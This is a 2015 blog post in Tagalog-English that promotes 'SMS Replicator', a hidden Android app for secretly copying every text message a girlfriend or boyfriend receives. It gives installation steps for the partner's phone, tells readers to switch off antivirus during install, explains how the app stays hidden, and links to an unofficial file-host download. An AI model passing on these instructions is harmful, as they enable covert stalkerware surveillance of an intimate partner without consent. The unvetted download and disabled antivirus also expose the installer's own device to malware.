Sunday, May 10, 2015

sms replicator

Posted By: SES - 3:35:00 AM
Image result for sms replicator
Heto share ko lang napulot ko sa kapit bahay sa mga nagha2nap kung
pa2no mabisto ang gf/bf nyo
Lahat ng txt na mre2cieve ng gf/bf mo
ay mre2cieve mo rin..
For example nilagyan ko ng sms
replicator ang cp ng gf ko, then lahat ng txt message na drating sa knya
automatic ko rin mre2cieve ang mga
yun..
credit kay nhey ng oh
Pano gawin?
Iinstall ang application n nsa baba, pgnainstall yan hndi mo mkkta ang
app.. magtext po ng 000 sa phone na
pinaglagyan, ang ipapangtext nyo, yun
din phone na pinalagyan, kumbaga
itext ang sarili, (para malinaw lang itxt
ang 000 send sa number ng pnaglagyan mo ng application..for
example la2gyan mo ang cp ng gf mo
at ang number nya ay 09271234567
punta write message txt 000 send to
09271234567) lalabas po ang settings
tapos sundin lang ang instruction.. http://www1.datafilehost.com/d/872f9a3b
NOTE: PANG ANDROID LANG PO
NOTE:Off nyo muna anti virus pag ka
install nyo tska nyo i on!
Ung anti virus.

Need ng l0ad yan per0. Kaylngan ung target ny0. Ung may l0ad kc d0n
yan mag bbwas! Bwt duplcte ng
messge na matatanggp nyo..May
byad per0. D0n yan Mbbws ung l0ad
sa bf/gf nyo

hindi ako makapag screenshot eh . . naka mobile pa ko ngayun . . fb nalang .
sa mga nag tatanung kung kung mauninstall pa ba to. oo. go to setting-application hanapin nyu yung app click and click uninstall done

0 comments:

Post a Comment